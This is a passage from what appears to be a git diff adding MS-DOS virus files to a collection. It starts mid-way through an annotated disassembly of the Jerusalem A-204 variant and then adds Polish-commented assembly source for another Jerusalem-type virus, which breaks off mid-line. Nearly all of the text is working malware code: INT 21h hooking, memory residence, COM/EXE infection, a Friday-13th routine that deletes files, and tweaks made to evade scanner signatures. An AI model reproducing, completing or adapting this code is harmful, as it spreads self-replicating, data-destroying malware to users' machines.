D8 MOV AX,DS +03B5 8E C0 MOV ES,AX +03B7 2E F7 26 7A 00 CS MUL W[07A] +03BC 2E 03 06 2B 00 CS ADD AX,W[02B] +03C1 83 D2 00 ADC DX,0 +03C4 2E F7 36 7A 00 CS DIV W[07A] +03C9 8E D8 MOV DS,AX +03CB 8B F2 MOV SI,DX +03CD 8B FA MOV DI,DX +03CF 8C C5 MOV BP,ES +03D1 2E 8B 1E 2F 00 CS MOV BX,W[02F] +03D6 0B DB OR BX,BX +03D8 74 13 JE 03ED +03DA B9 00 80 MOV CX,08000 +03DD F3 A5 REP MOVSW +03DF 05 00 10 ADD AX,01000 +03E2 81 C5 00 10 ADD BP,01000 +03E6 8E D8 MOV DS,AX +03E8 8E C5 MOV ES,BP +03EA 4B DEC BX +03EB 75 ED JNE 03DA +03ED 2E 8B 0E 2D 00 CS MOV CX,W[02D] +03F2 F3 A4 REP MOVSB +03F4 58 POP AX +03F5 50 PUSH AX +03F6 05 10 00 ADD AX,010 +03F9 2E 01 06 29 00 CS ADD W[029],AX +03FE 2E 01 06 25 00 CS ADD W[025],AX +0403 2E A1 21 00 CS MOV AX,W[021] +0407 1F POP DS +0408 07 POP ES +0409 2E 8E 16 29 00 CS MOV SS,W[029] +040E 2E 8B 26 27 00 CS MOV SP,W[027] +0413 2E FF 2E 23 00 CS JMP D[023] + + ; We come here if B[0Eh]=1, + ; which means Friday 13th, + ; year<>1987. This routine + ; deletes the loaded file. +0418 33 C9 XOR CX,CX ; Clear all bits of the File + ; Attribute +041A B8 01 43 MOV AX,04301 ; +041D CD 21 INT 021 ; Put File Atributes + +041F B4 41 MOV AH,041 ; +0421 CD 21 INT 021 ; Delete a File (Unlink) + +0423 B8 00 4B MOV AX,04B00 + +0426 9D POPF ; Get Flags +0427 2E FF 2E 17 00 CS JMP D[017] + + ; We come here each time a + ; file is loaded with the + ; load and execute call + ; (INT 21h, AX=4B00h) +042C 2E 80 3E 0E 00 01 CS CMP B[0E],1 ; Is it Friday 13th, + ; year<>1987? +0432 74 E4 JE 0418 ; Yes: -> 0418h +0434 2E C7 06 70 00 FF FF CS MOV W[070],-1 ; File Handle -1 ??? +043B 2E C7 06 8F 00 00 00 CS MOV W[08F],0 ; Clear Memory-Available + ; variable +0442 2E 89 16 80 00 CS MOV W[080],DX ; DS:DX -> ASCIZ Filename, +0447 2E 8C 1E 82 00 CS MOV W[082],DS ; Store DX and DS +044C 50 PUSH AX +044D 53 PUSH BX +044E 51 PUSH CX +044F 52 PUSH DX +0450 56 PUSH SI +0451 57 PUSH DI +0452 1E PUSH DS +0453 06 PUSH ES +0454 FC CLD +0455 8B FA MOV DI,DX ; +0457 32 D2 XOR DL,DL ; DL=00h : Take Default Drive +0459 80 7D 01 3A CMP B[DI+1],03A ; ':' at 2nd place in ASCIZ- + ; filename +045D 75 05 JNE 0464 ; No: -> 0464h +045F 8A 15 MOV DL,B[DI] ; Get Drive Letter +0461 80 E2 1F AND DL,01F ; Get Drive Code + ; 0 = Default + ; 1 = A + ; 2 = B, etc. +0464 B4 36 MOV AH,036 ; +0466 CD 21 INT 021 ; Get disk space + ; BX=# of available clusters + ; CX=Bytes per sector + ; DX=Total clusters + +0468 3D FF FF CMP AX,-1 ; No Sectors Free? +046B 75 03 JNE 0470 ; No: -> 0470h +046D E9 77 02 JMP 06E7 ; Yes: -> 06E7h + + +0470 F7 E3 MUL BX ; Calculate Free Space +0472 F7 E1 MUL CX ; +0474 0B D2 OR DX,DX ; +0476 75 05 JNE 047D ; +0478 3D 10 07 CMP AX,0710 ; 1808 Bytes Free? +047B 72 F0 JB 046D ; No: -> 046Dh +047D 2E 8B 16 80 00 CS MOV DX,W[080] ; Restore DX's ASCIZ Filename +0482 1E PUSH DS +0483 07 POP ES +0484 32 C0 XOR AL,AL ; AL=00h +0486 B9 41 00 MOV CX,041 ; +0489 F2 AE REPNE SCASB ; Check if filename +048B 2E 8B 36 80 00 CS MOV SI,W[080] ; is in UPPERCASE +0490 8A 04 MOV AL,B[SI] ; +0492 0A C0 OR AL,AL ; All UPPERRCASE? +0494 74 0E JE 04A4 ; IF so: -> 04A4h +0496 3C 61 CMP AL,061 ; AL<'a' ? +0498 72 07 JB 04A1 ; Yes: -> 04A1h +049A 3C 7A CMP AL,07A ; AL>'z' ? +049C 77 03 JA 04A1 ; Yes: -> 04A1h +049E 80 2C 20 SUB B[SI],020 ; Transfer filename + ; into UPPERCASE +04A1 46 INC SI ; SI=SI+1 +04A2 EB EC JMP 0490 + +04A4 B9 0B 00 MOV CX,0B ; CX=0Bh +04A7 2B F1 SUB SI,CX ; Return SI to start + ; of Filename +04A9 BF 84 00 MOV DI,084 ; Start of COMMAND.COM + ; filename +04AC 0E PUSH CS +04AD 07 POP ES +04AE B9 0B 00 MOV CX,0B +04B1 F3 A6 REPE CMPSB ; Filename=COMMAND.COM ? +04B3 75 03 JNE 04B8 ; No: -> 04B8h +04B5 E9 2F 02 JMP 06E7 ; Yes: -> 06E7h + + ; We come here if the + ; loaded program is not + ; COMMAND.COM +04B8 B8 00 43 MOV AX,04300 ; +04BB CD 21 INT 021 ; Get File Attributes + +04BD 72 05 JB 04C4 ; If Error: -> 04C4h +04BF 2E 89 0E 72 00 CS MOV W[072],CX ; Store File Attributes +04C4 72 25 JB 04EB ; If Error: -> 04EBh +04C6 32 C0 XOR AL,AL ; AL=00h +04C8 2E A2 4E 00 CS MOV B[04E],AL ; Dummy=0 +04CC 1E PUSH DS ; +04CD 07 POP ES ; +04CE 8B FA MOV DI,DX ; +04D0 B9 41 00 MOV CX,041 ; +04D3 F2 AE REPNE SCASB ; +04D5 80 7D FE 4D CMP B[DI-2],04D ; "M" ? +04D9 74 0B JE 04E6 ; Yes: -> 04E6h +04DB 80 7D FE 6D CMP B[DI-2],06D ; "m" ? +04DF 74 05 JE 04E6 ; Yes: -> 04E6h +04E1 2E FE 06 4E 00 CS INC B[04E] ; Dummy=Dummy+1 +04E6 B8 00 3D MOV AX,03D00 ; Open Disk File with +04E9 CD 21 INT 021 ; handle in compatibility + ; mode + ; DS:DX : -> ASCIZ Filename + +04EB 72 5A JB 0547 ; IF Error: -> 0547h +04ED 2E A3 70 00 CS MOV W[070],AX ; Store File Handle +04F1 8B D8 MOV BX,AX ; BX=File Handle +04F3 B8 02 42 MOV AX,04202 ; Move File Read/Write + ; Pointer (LSEEK) with + ; offset from end of file +04F6 B9 FF FF MOV CX,-1 ; CX:DX = offset in bytes +04F9 BA FB FF MOV DX,-5 ; +04FC CD 21 INT 021 ; + ; DX:AX = new absolute + ; offset from beginning of + ; file + +04FE 72 EB JB 04EB ; If Error: -> 04EBh +0500 05 05 00 ADD AX,5 ; ???? +0503 2E A3 11 00 CS MOV W[011],AX ; Store Length of File + +0507 B9 05 00 MOV CX,5 ; Read from a file with +050A BA 6B 00 MOV DX,06B ; handle BX 5h bytes into +050D 8C C8 MOV AX,CS ; DS:DX buffer +050F 8E D8 MOV DS,AX ; +0511 8E C0 MOV ES,AX ; +0513 B4 3F MOV AH,03F ; +0515 CD 21 INT 021 ; + +0517 8B FA MOV DI,DX ; DI=DX=6Bh +0519 BE 05 00 MOV SI,5 ; SI=05h +051C F3 A6 REPE CMPSB ; Check first 5 bytes to see + ; if a file already is + ; infected +051E 75 07 JNE 0527 ; If not: -> 0527h +0520 B4 3E MOV AH,03E ; Close a file with +0522 CD 21 INT 021 ; handle + +0524 E9 C0 01 JMP 06E7 ; Jump -> 06E7h + +0527 B8 24 35 MOV AX,03524 ; Get original int 24h +052A CD 21 INT 021 ; vector. Stored in ES:BX + +052C 89 1E 1B 00 MOV W[01B],BX ; Store BX of INT 24h vector +0530 8C 06 1D 00 MOV W[01D],ES ; Store ES of INT 24h vector +0534 BA 1B 02 MOV DX,021B ; Set new int 24h vector +0537 B8 24 25 MOV AX,02524 ; to DS:DX +053A CD 21 INT 021 ; + +053C C5 16 80 00 LDS DX,[080] ; DS:DX=Filename +0540 33 C9 XOR CX,CX ; Get fileattributes +0542 B8 01 43 MOV AX,04301 ; Put File Attributes +0545 CD 21 INT 021 ; (CHMOD) + +0547 72 3B JB 0584 ; If Error: -> 0584h +0549 2E 8B 1E 70 00 CS MOV BX,W[070] ; Close a file with +054E B4 3E MOV AH,03E ; handle BX +0550 CD 21 INT 021 ; + +0552 2E C7 06 70 00 FF FF CS MOV W[070],-1 ; File Handle=-1 ??? +0559 B8 02 3D MOV AX,03D02 ; Open File with +055C CD 21 INT 021 ; Handle in READ/WRITE mode + +055E 72 24 JB 0584 ; If Error: -> 0584h +0560 2E A3 70 00 CS MOV W[070],AX ; Store File Handle +0564 8C C8 MOV AX,CS +0566 8E D8 MOV DS,AX +0568 8E C0 MOV ES,AX + +056A 8B 1E 70 00 MOV BX,W[070] ; BX=File Handle +056E B8 00 57 MOV AX,05700 ; Get File' date/time- +0571 CD 21 INT 021 ; stamp + +0573 89 16 74 00 MOV W[074],DX ; Move File Read/Write Pointer +0577 89 0E 76 00 MOV W[076],CX ; (LSEEK) with offset from +057B B8 00 42 MOV AX,04200 ; beginning of file with +057E 33 C9 XOR CX,CX ; CX:DX bytes +0580 8B D1 MOV DX,CX ; +0582 CD 21 INT 021 ; + +0584 72 3D JB 05C3 ; If Error: -> 05C3h +0586 80 3E 4E 00 00 CMP B[04E],0 ; '0'? +058B 74 03 JE 0590 ; Yes: -> 0590h +058D EB 57 JMP 05E6 ; JUMP -> 05E6h + +058F 90 NOP + +0590 BB 00 10 MOV BX,01000 ; Number of 16d-byte para- + ; graphs BX=1000h For COM- + ; files there are 1000h 16d + ; bytes paragrahs available +0593 B4 48 MOV AH,048 ; +0595 CD 21 INT 021 ; Allocate Memory + +0597 73 0B JAE 05A4 ; If enough memory available + ; -> 05A4h +0599 B4 3E MOV AH,03E ; Close a file with +059B 8B 1E 70 00 MOV BX,W[070] ; handle BX +059F CD 21 INT 021 ; + +05A1 E9 43 01 JMP 06E7 ; JUMP -> 06E7h + +05A4 FF 06 8F 00 INC W[08F] ; Set Memory-Available + ; Variable (0001h) +05A8 8E C0 MOV ES,AX ; +05AA 33 F6 XOR SI,SI ; SI=0000h +05AC 8B FE MOV DI,SI ; DI=0000h +05AE B9 10 07 MOV CX,0710 ; CX=0710h (1808d) + ; length of virus +05B1 F3 A4 REP MOVSB ; Put virus code at begin- + ; ning of buffer ES:DI +05B3 8B D7 MOV DX,DI ; DX=DI=0710h +05B5 8B 0E 11 00 MOV CX,W[011] ; Restore Length of File +05B9 8B 1E 70 00 MOV BX,W[070] ; Restore File Handle +05BD 06 PUSH ES ; Read from a file with +05BE 1F POP DS ; handle CX (length +05BF B4 3F MOV AH,03F ; of file) bytes in buffer +05C1 CD 21 INT 021 ; DS:DX + +05C3 72 1C JB 05E1 ; If Error: -> 05E1h +05C5 03 F9 ADD DI,CX ; DI=Length of original + ; file+0710h (length of + ; viruscode)+05h +05C7 33 C9 XOR CX,CX ; CX=0000h +05C9 8B D1 MOV DX,CX ; Move file read/write +05CB B8 00 42 MOV AX,04200 ; pointer with offset from +05CE CD 21 INT 021 ; beginning of file + +05D0 BE 05 00 MOV SI,5 ; +05D3 B9 05 00 MOV CX,5 ; +05D6 F3 2E A4 REP CS MOVSB ; +05D9 8B CF MOV CX,DI ; CX=0715h(1813d)+length of + ; original code +05DB 33 D2 XOR DX,DX ; DX=0000h +05DD B4 40 MOV AH,040 ; Write to file with handle +05DF CD 21 INT 021 ; CX bytes + +05E1 72 0D JB 05F0 ; If Error: -> 05F0h +05E3 E9 BC 00 JMP 06A2 ; JUMP -> 06A2h + +05E6 B9 1C 00 MOV CX,01C ; Read CX (1Ch) bytes from +05E9 BA 4F 00 MOV DX,04F ; file with handle +05EC B4 3F MOV AH,03F ; +05EE CD 21 INT 021 ; + +05F0 72 4A JB 063C ; If Error: -> 063Ch +05F2 C7 06 61 00 84 19 MOV W[061],01984 ; Store 1984h=6532d +05F8 A1 5D 00 MOV AX,W[05D] ; +05FB A3 45 00 MOV W[045],AX ; +05FE A1 5F 00 MOV AX,W[05F] ; +0601 A3 43 00 MOV W[043],AX ; +0604 A1 63 00 MOV AX,W[063] ; +0607 A3 47 00 MOV W[047],AX ; +060A A1 65 00 MOV AX,W[065] ; +060D A3 49 00 MOV W[049],AX ; +0610 A1 53 00 MOV AX,W[053] ; +0613 83 3E 51 00 00 CMP W[051],0 ; '0000'? +0618 74 01 JE 061B ; Yes: -> 061Bh +061A 48 DEC AX ; AX=AX-01h +061B F7 26 78 00 MUL W[078] ; +061F 03 06 51 00 ADD AX,W[051] ; +0623 83 D2 00 ADC DX,0 ; +0626 05 0F 00 ADD AX,0F ; +0629 83 D2 00 ADC DX,0 ; +062C 25 F0 FF AND AX,-010 ; +062F A3 7C 00 MOV W[07C],AX ; Store AX +0632 89 16 7E 00 MOV W[07E],DX ; Store DX +0636 05 10 07 ADD AX,0710 ; AX=AX+1808 +0639 83 D2 00 ADC DX,0 ; +063C 72 3A JB 0678 ; If Error :-> 0678h +063E F7 36 78 00 DIV W[078] ; +0642 0B D2 OR DX,DX ; +0644 74 01 JE 0647 ; +0646 40 INC AX ; AX=AX+01h +0647 A3 53 00 MOV W[053],AX ; +064A 89 16 51 00 MOV W[051],DX ; +064E A1 7C 00 MOV AX,W[07C] ; Restore AX +0651 8B 16 7E 00 MOV DX,W[07E] ; Restore DX +0655 F7 36 7A 00 DIV W[07A] ; +0659 2B 06 57 00 SUB AX,W[057] ; +065D A3 65 00 MOV W[065],AX ; +0660 C7 06 63 00 C5 00 MOV W[063],0C5 ; +0666 A3 5D 00 MOV W[05D],AX ; +0669 C7 06 5F 00 10 07 MOV W[05F],0710 ; +066F 33 C9 XOR CX,CX ; CX=0000h +0671 8B D1 MOV DX,CX ; DX=0000h +0673 B8 00 42 MOV AX,04200 ; Move File Read/Write +0676 CD 21 INT 021 ; pointer to beginning of + ; file + +0678 72 0A JB 0684 ; If Error: -> 0684h +067A B9 1C 00 MOV CX,01C ; CX=1Ch +067D BA 4F 00 MOV DX,04F ; DX=4Fh +0680 B4 40 MOV AH,040 ; Write to file with +0682 CD 21 INT 021 ; handle + +0684 72 11 JB 0697 ; If Error: -> 0697h +0686 3B C1 CMP AX,CX ; Are all bytes written? +0688 75 18 JNE 06A2 ; No: -> 06A2h +068A 8B 16 7C 00 MOV DX,W[07C] ; Restore AX into DX +068E 8B 0E 7E 00 MOV CX,W[07E] ; Restore DX into CX +0692 B8 00 42 MOV AX,04200 +0695 CD 21 INT 021 + +0697 72 09 JB 06A2 ; If Error: -> 06A2h +0699 33 D2 XOR DX,DX ; DX=0000h +069B B9 10 07 MOV CX,0710 ; CX=0710h +069E B4 40 MOV AH,040 +06A0 CD 21 INT 021 + +06A2 2E 83 3E 8F 00 00 CS CMP W[08F],0 ; Not Enough Memory? +06A8 74 04 JE 06AE ; Yes: -> 06AEh +06AA B4 49 MOV AH,049 ; Free memory +06AC CD 21 INT 021 ; + +06AE 2E 83 3E 70 00 FF CS CMP W[070],-1 +06B4 74 31 JE 06E7 +06B6 2E 8B 1E 70 00 CS MOV BX,W[070] ; Restore File Handle +06BB 2E 8B 16 74 00 CS MOV DX,W[074] ; Restore File Date +06C0 2E 8B 0E 76 00 CS MOV CX,W[076] ; Restore File Time +06C5 B8 01 57 MOV AX,05701 ; Set File's Date/Time +06C8 CD 21 INT 021 ; stamp + +06CA B4 3E MOV AH,03E ; Close a file with +06CC CD 21 INT 021 ; handle + +06CE 2E C5 16 80 00 CS LDS DX,[080] ; Get place (DS:DX) of + ; filename +06D3 2E 8B 0E 72 00 CS MOV CX,W[072] ; Restore File Attributes +06D8 B8 01 43 MOV AX,04301 ; Put File Attributes +06DB CD 21 INT 021 ; + +06DD 2E C5 16 1B 00 CS LDS DX,[01B] ; Restore original vector +06E2 B8 24 25 MOV AX,02524 ; of interrupt 24h +06E5 CD 21 INT 021 ; + +06E7 07 POP ES ; Restore Registers +06E8 1F POP DS +06E9 5F POP DI +06EA 5E POP SI +06EB 5A POP DX +06EC 59 POP CX +06ED 5B POP BX +06EE 58 POP AX +06EF 9D POPF ; Restore Flags +06F0 2E FF 2E 17 00 CS JMP D[017] ; Call original INT 21h + ; address which was intercep- + ; ted with the LOAD & EXEC. + ; statement. Which means it + ; will load and execute the + ; selected file + +06F5 00 00 00 00 00 00 00 00 00 00 00 + +0700 4D DE 0C 00 10 00 00 00 00 00 00 00 00 00 00 00 + +0710 E9 92 00 JMP 07A5 ; JUMP -> 07A5h + +0711h til 07A4h are the same definition words/bytes as at 0103h til 0194h + +07A5 FC CLD +07A6 B4 E0 MOV AH,0E0 +07A8 CD 21 INT 021 + +07AA 80 FC E0 CMP AH,0E0 ; AH>=E0h? +07AD 73 16 JAE 07C5 ; Yes: -> 07C5h +07AF 80 FC 03 CMP AH,3 ; AH<03h +07B2 72 11 JB 07C5 ; Yes: -> 07C5h + ; The only way that the + ; code get passed here if + ; the virus is active in + ; memory. It will return + ; AX=0300h then. +07B4 B4 DD MOV AH,0DD +07B6 BF 00 01 MOV DI,0100 ; DI=0100h +07B9 BE 10 07 MOV SI,0710 ; SI=0710h +07BC 03 F7 ADD SI,DI ; SI=0810h +07BE 2E 8B 8D 11 00 CS MOV CX,W[DI+011]; CX=Length of file +07C3 CD 21 INT 021 + +07C5 8C C8 MOV AX,CS ; AX=CS +07C7 05 10 00 ADD AX,010 ; AX=AX+10h +07CA 8E D0 MOV SS,AX ; SS=CS+10h +07CC BC 00 07 MOV SP,0700 ; SP=0700h +07CF 50 PUSH AX ; Store AX +07D0 B8 C5 00 MOV AX,0C5 ; AX=00C5h +07D3 50 PUSH AX ; Store AX +07D4 CB RETF ; RETURN from FAR + +07D5 FC CLD ; Clear Direct + + ; Here the A-204 variant + ; differs from the original + ; Jerusalem Version B virus + ; for the second time. +07D6 2E 8C 06 31 00 CS MOV W[031],ES ; These two lines have +07DB 06 PUSH ES ; been changed in order + ; trying to avoid being + ; detected by the finger- + ; print in the VirScan.Dat + ; file. It has not succeeded + ; because the strain VirScan + ; searches for appears two + ; times in the viruscode + +07DC 2E 8C 06 39 00 CS MOV W[039],ES ; Store ES +07E1 2E 8C 06 3D 00 CS MOV W[03D],ES ; Store ES +07E6 2E 8C 06 41 00 CS MOV W[041],ES ; Store ES + +07EB 8C C0 MOV AX,ES ; AX=ES +07ED 05 10 00 ADD AX,010 ; AX=AX+10h +07F0 2E 01 06 49 00 CS ADD W[049],AX ; Store ES+10h +07F5 2E 01 06 45 00 CS ADD W[045],AX ; Store ES+10h + +07FA B4 E0 MOV AH,0E0 ; AH=E0h +07FC CD 21 INT 021 ; + +07FE 80 FC E0 CMP AH,0E0 ; AH>=E0? +0801 73 13 JAE 0816 ; Yes: -> 0816h + ; This will never happen. + ; First of all it would be + ; a short jump into the + ; original program. Secondly + ; is the virus already active + ; in memory and will return + ; AX=0300h at the INT 21h call + ; with AH=E0h +0803 80 FC 03 CMP AH,3 ; AH=03h +0806 07 POP ES ; Restore ES +0807 2E 8E 16 45 00 CS MOV SS,W[045] ; Restore ES+10 into SS +080C 2E 8B 26 43 90 CS MOV SP,W[09043] ; + +0810 90 NOP ; Start ofOriginal Program +0811 90 NOP +0812 90 NOP +0813 90 NOP +0814 90 NOP +0815 90 NOP +0816 90 NOP +0817 90 NOP +0818 90 NOP +0819 90 NOP +081A 90 NOP +081B 90 NOP +081C 90 NOP +081D 90 NOP +081E 90 NOP +081F 90 NOP +0820 90 NOP +0821 90 NOP +0822 90 NOP +0823 90 NOP +0824 90 NOP +0825 90 NOP +0826 90 NOP +0827 90 NOP +0828 90 NOP +0829 90 NOP +082A 90 NOP +082B 90 NOP +082C 90 NOP +082D 90 NOP +082E 90 NOP +082F C3 RET ; End of Original Program + +0830 2D 32 30 34 2A ; -204* + +NOTE: A-204 is a course-code for IAP (Inleiding Apparatuur en Programmatuur, +in English a Prologue in Hardware and Software) at my university. In this +course the PDP-11 Language is being teached. It's my opion, and my opion only, +that this change has been made by a first year student. The IAP-course is +a course for first years students. Only some lines were changed in order to +avoid detection. If the 'author' did know more about the 8086, (s?)he could +have optimized the code. Some pieces can be done much more elegant. \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.j_sundyb.asm b/MSDOS/Virus.MSDOS.Unknown.j_sundyb.asm new file mode 100644 index 00000000..9bfc41d7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.j_sundyb.asm @@ -0,0 +1,727 @@ +; COM - na poczatku +; EXE - na koncu +; rozpoznaje wg nazwy (co nie COM = EXE) +;------- +; aktywacja w niedziele roku roznego od 1989 +; procedury niszczacej +;------- +; doniesienia co 30 minut +; ale nigdy nie wlaczone +;------- +; Nie zaraza COMMAND.COM'a +;------- + +LF EQU 0AH +CR EQU 0DH + +;INITIAL VALUES : CS:IP 0918:00C4 +; SS:SP 0918:065D + +;---------------- +; <- tutaj cialo programu +;---------------- + +S9180 SEGMENT STACK + ASSUME DS:S9180, SS:S9180 ,CS:S9180 ,ES:S9180 +L9180: jmp L0095 ;L9215 ;9180 E9 92 00 + + db 73h,55h ;'sU' ;9183 73 55 + + ;<- wzorzec sygnatury zarazenia +L0005 DB 0C8H,0F7h,0E1h,0EEh,0E7h ;9185 C8 F7 E1 EE E7 + +L000A dw 100h ;IP nosiciela COM ;918A 00 01 +L000C dw 1905h ;CS nosiciela COM ;918C 05 19 + +L000E db 0 ;ptr aktywnosci wirusa ;918E 00 +L000F dw 0 ;918F 00 00 +L0011 dw 9374h ;dlugosc programu oryginalna ;9191 74 93 + +L0013 dw 0FEA5h ;old int 8 ;9193 A5 +L0015 dw 0F000h ;9195 00 +L0017 dw 1460h ;old int 21h ;9197 60 14 +L0019 dw 025Bh ;9199 5B 02 +L001B dw 0556h ;old int 24h ;919B 56 05 +L001D dw 0BA6h ;919D A6 0B + +L001F dw 32400 ;30 minut zwloki ;919F 90 7E + dw 0 ;91A1 00 00 + dw 0 ;91A3 00 00 + dw 0 ;91A5 00 00 + dw 0 ;91A7 00 00 + dw 0 ;91A9 00 00 + dw 0 ;91AB 00 00 + dw 0E800h ;91AD 00 E8 + dw 5F06h ;91AF 06 5F + +L0031 dw 0C89h ;adres bloku wirusa ;91B1 89 0C +L0033 dw 80h ;wielkosc bloku wirusa (para) ;91B3 80 00 + + ;<----- Parameter Block +L0035 dw 0 ;Environment ;91B5 00 00 + dw 80h ;<- command line ;91B7 80 00 +L0039 dw 0C89h ; Segment ;91B9 89 0C + dw 5Ch ;<- FCB-1 ;91BB 5C 00 +L003D dw 0C89h ; Segment ;91BD 89 0C + dw 6Ch ;<- FCB-2 ;91BF 6C 00 +L0041 dw 0C89h ; Segment ;91C1 89 0C + +L0043 dw 0800h ;SP nosiciela ;91C3 00 08 +L0045 dw 0A58h ;rel segment stosu nosiciela ;91C5 58 0A + +L0047 dw 3D73h ;IP nosiciela ;91C7 73 3D +L0049 dw 0 ;CS nosiciela (rel) ;91C9 00 00 + + ;pierwsze 3 bajty wektora int ff +L004B dw 0F000h ;91CB 00 F0 +L004D db 46h ;91CD 46 + +L004E db 1 ;0=COM, 1=EXE ;91CE 01 + + ;<- bufor na poczatek zbioru +L004F db 'MZ' ;91CF 4D 5A +L0051 dw 01E4h ;last page bytes ;91D1 E4 01 +L0053 dw 004Dh ;file size - pages ;91D3 4D 00 + dw 0004h ;91D5 04 00 +L0057 dw 0020h ;header size (para) ;91D7 20 00 + dw 01C1h ;91D9 C1 01 + dw 0FFFFh ;91DB FF FF +L005D dw 0918h ;SS ;91DD 18 09 +L005F dw 065Dh ;SP ;91DF 5D 06 +L0061 dw 1984h ;suma kontrolna ;91E1 84 19 +L0063 dw 00C4h ;IP ;91E3 C4 00 +L0065 dw 0918h ;CS ;91E5 18 09 + dw 001Eh ;91E7 1E 00 + dw 0000h ;91E9 00 00 + + ;<- bufor na 5 ostatnich bajtow zbioru +L006B db 0Ah,0,0FFh,0FFh,0FFh ;91EB 0A 00 FF FF FF + +L0070 dw 5 ;File handle ;91F0 05 00 +L0072 dw 20h ;atrybut zarazanego zbioru ;91F2 20 00 +L0074 dw 1031h ;91F4 31 10 +L0076 dw 0A337h ;91F6 37 A3 +L0078 dw 200h ;bytes/sector(page) ;91F8 00 02 +L007A dw 10h ;bytes/paragraph ;91FA 10 00 +L007C dw 9380h ;nowa dlugosc zbioru DWORD ;91FC 80 93 +L007E dw 0 ;91FD 00 00 + +L0080 dw 41B9h ;path nazwy programu - offset ;9200 B9 41 +L0082 dw 9B2Ah ; - segment ;9202 2A 9B + +L0084 db 'COMMAND.COM' ;9294 43 4F 4D 4D 41 4E 44 2E 43 4F 4D +L008F dw 0,0,0 ;929F 00 00 00 00 00 00 + +;================================================ +; <- Start wirusa zbiorow COM +;------------------------------------------------ +L0095: CLD ;9215 FC + MOV AH,0FFH ;kontrola rezydowania ;9216 B4 FF + INT 21H ;9218 CD 21 + CMP AH,0FFH ;921A 80 FC FF + JNB L9234 ;-> nie rezyduje ;921D 73 15 + CMP AH,4 ;921F 80 FC 04 + JB L9234 ;-> nie rezyduje ;9222 72 10 + ;<- wirus juz rezyduje + MOV AH,0DDH ;uruchom program ;9224 B4 DD + MOV DI,100h ;miejsce docelowe programu ;9226 BF 00 01 + MOV SI,OFFSET L065F ;9229 BE 5F 06 + ADD SI,DI ;miejsce aktualne programu ;922C 03 F7 + MOV CX,CS:[DI+11H] ;dlugosc programu oryginalna ;922E 2E 8B 4D 11 + INT 21H ;9232 CD 21 + +L9234: MOV AX,CS ;normalizacja segmentu ;9234 8C C8 + ADD AX,10h ;9236 05 10 00 + MOV SS,AX ;9239 8E D0 + MOV SP,OFFSET L065D ;923B BC 5D 06 + PUSH AX ;segment ;923E 50 + MOV AX,OFFSET L00C4 ;=L9244 ;923F B8 C4 00 + PUSH AX ;offset ;9242 50 + RETF ;9243 CB + +;================================================ +; <- Start wirusa zbioru EXE +;------------------------------------------------ +L00C4: +L9244: CLD ;9244 FC + PUSH ES ;<- PSP ;9245 06 + MOV CS:L0031,ES ;9246 2E 8C 06 31 00 + MOV CS:L0039,ES ;924B 2E 8C 06 39 00 + MOV CS:L003D,ES ;9250 2E 8C 06 3D 00 + MOV CS:L0041,ES ;9255 2E 8C 06 41 00 + MOV AX,ES ;segment poczatku pgm ;925A 8C C0 + ADD AX,10h ;925C 05 10 00 + ADD CS:L0049,AX ;relokowanie CS ;925F 2E 01 06 49 00 + ADD CS:L0045,AX ;relokowanie SS ;9264 2E 01 06 45 00 + MOV AH,0FFH ;czy juz rezyduje ? ;9269 B4 FF + INT 21H ;926B CD 21 + CMP AH,4 ;926D 80 FC 04 + JNZ L9282 ;-> jeszcze nie ;9270 75 10 + + POP ES ;<- uruchomienie pgm ;9272 07 + MOV SS,CS:L0045 ;inicjacja stosu ;9273 2E 8E 16 45 00 + MOV SP,CS:L0043 ;9278 2E 8B 26 43 00 + JMP DWORD PTR CS:L0047 ;uruchomienie nosiciela ;927D 2E FF 2E 47 00 + + ;<- zarezydowanie +L9282: XOR AX,AX ;9282 33 C0 + MOV ES,AX ;9284 8E C0 + MOV BX,03FCh ;int 0ffh ;9286 BB FC 03 + MOV AX,ES:[BX] ;9289 26 8B 07 + MOV CS:L004B,AX ;928C 2E A3 4B 00 + MOV AL,ES:[BX+2] ;9290 26 8A 47 02 + MOV CS:L004D,AL ;9294 2E A2 4D 00 + MOV WORD PTR ES:[BX],0A5F3h ;rep movsw ;9298 26 C7 07 F3 A5 + MOV BYTE PTR ES:[BX+2],0CBH ;ret ;929D 26 C6 47 02 CB + POP AX ;92A2 58 + ADD AX,10h ;92A3 05 10 00 + MOV ES,AX ;92A6 8E C0 + PUSH CS ;92A8 0E + POP DS ;92A9 1F + MOV CX,OFFSET L065F ;dl. wir. bez podpisu ;92AA B9 5F 06 + SHR CX,1 ;na slowa ;92AD D1 E9 + XOR SI,SI ;offset zrodlowy ;92AF 33 F6 + MOV DI,SI ;offset wynikowy ;92B1 8B FE + PUSH ES ;segment przepisanego ;92B3 06 + MOV AX,OFFSET L013C ;offset kontynuacji ;92B4 B8 3C 01 + PUSH AX ;92B7 50 + JMP DWORD PTR L05F6 ;skok w wektor int FF ;92B8 FF 2E F6 05 + + ;<- kontynuacja na nowym miejscu +L013C: MOV AX,CS ;92BC 8C C8 + MOV SS,AX ;92BE 8E D0 + MOV SP,OFFSET L065D ;92C0 BC 5D 06 + XOR AX,AX ;92C3 33 C0 + MOV DS,AX ;92C5 8E D8 + MOV AX,CS:L004B ;odtworzenie wektora int ff ;92C7 2E A1 4B 00 + MOV [BX],AX ;92CB 89 07 + MOV AL,CS:L004D ;92CD 2E A0 4D 00 + MOV [BX+2],AL ;92D1 88 47 02 + + MOV BX,SP ;sp -> paragraf ;92D4 8B DC + MOV CL,4 ;92D6 B1 04 + SHR BX,CL ;92D8 D3 EB + ADD BX,20h ;+512 ;92DA 83 C3 20 + and bx,0fff0h ;92DD 83 E3 F0 + MOV CS:L0033,BX ;paragrafy bloku potrzebne ;92E0 2E 89 1E 33 00 + MOV AH,4AH ;Set Block ;92E5 B4 4A + MOV ES,CS:L0031 ;segment bloku ;92E7 2E 8E 06 31 00 + INT 21H ;92EC CD 21 + MOV AX,3521h ;Get int 21h ;92EE B8 21 35 + INT 21H ;92F1 CD 21 + MOV CS:L0017,BX ;92F3 2E 89 1E 17 00 + MOV CS:L0019,ES ;92F8 2E 8C 06 19 00 + PUSH CS ;92FD 0E + POP DS ;92FE 1F + MOV DX,OFFSET L02D2 ;92FF BA D2 02 + MOV AX,2521h ;Set int 21h ;9302 B8 21 25 + INT 21H ;9305 CD 21 + MOV ES,[L0031] ;segment wirusa ;9307 8E 06 31 00 + MOV ES,ES:[2Ch] ;environment ;930B 26 8E 06 2C 00 + XOR DI,DI ;szukamy 